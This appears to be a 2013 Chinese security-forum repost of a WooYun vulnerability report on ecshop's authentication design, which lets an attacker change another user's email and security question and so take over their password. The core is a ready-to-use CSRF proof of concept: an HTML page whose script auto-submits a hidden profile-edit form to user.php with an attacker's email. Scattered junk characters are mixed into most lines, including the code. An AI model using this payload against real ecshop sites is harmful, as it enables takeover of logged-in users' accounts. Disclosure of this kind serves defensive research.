找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1951|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:# |' W4 q" E1 C3 g3 W2 ^
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现; U- A0 J" ]. i% e
8 T, j% T4 @& D' e9 j7 S$ M
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
- A; ?( Z  J" [3 O0 _1 Y* _$ M) @* u. p6 x
详细说明:6 E( V) g+ X4 X: @0 U  |  M
利用csrf和xss可以突破官方所说的“障碍”
( k& z5 s0 G! V6 ^+ v" x: ?xss版本已经有人说明! i* O" ?* y( [& z2 X: F" x
这里给出csrf版本# A" P. D* X0 G( O7 d

& v* K+ ?) b" P! A5 M# O& l/ m漏洞证明:
8 }5 K, u6 `  Z7 F<html>5 ~# u  W$ C% h/ `2 P: `0 J! Y
<body>
1 Q" \( h/ t4 k' T<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' B; }6 G2 o- |+ v- f: W. {<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">3 u( M! p( I* g: }# E% N- N
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
% G) W5 @% z! d4 I6 g, [<INPUT TYPE="text" NAME="sel_question" value="ecshop">* B7 x5 \% I; \; q1 G
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">; Z' @- c/ G/ i$ \! S
</body>$ D1 |5 U3 n; G7 z5 i; m2 D
<script>8 w9 k9 T2 w+ {1 L# t* _
document.forms[0].submit();
/ W) d5 h( P" N</script>
. J- D4 a6 J9 E; w+ D7 W</html>8 y7 j% Q* H0 l& O3 d; Y  R
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失7 W1 K6 f- l" K1 p; A' Y
5 z; v! q/ _4 j8 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表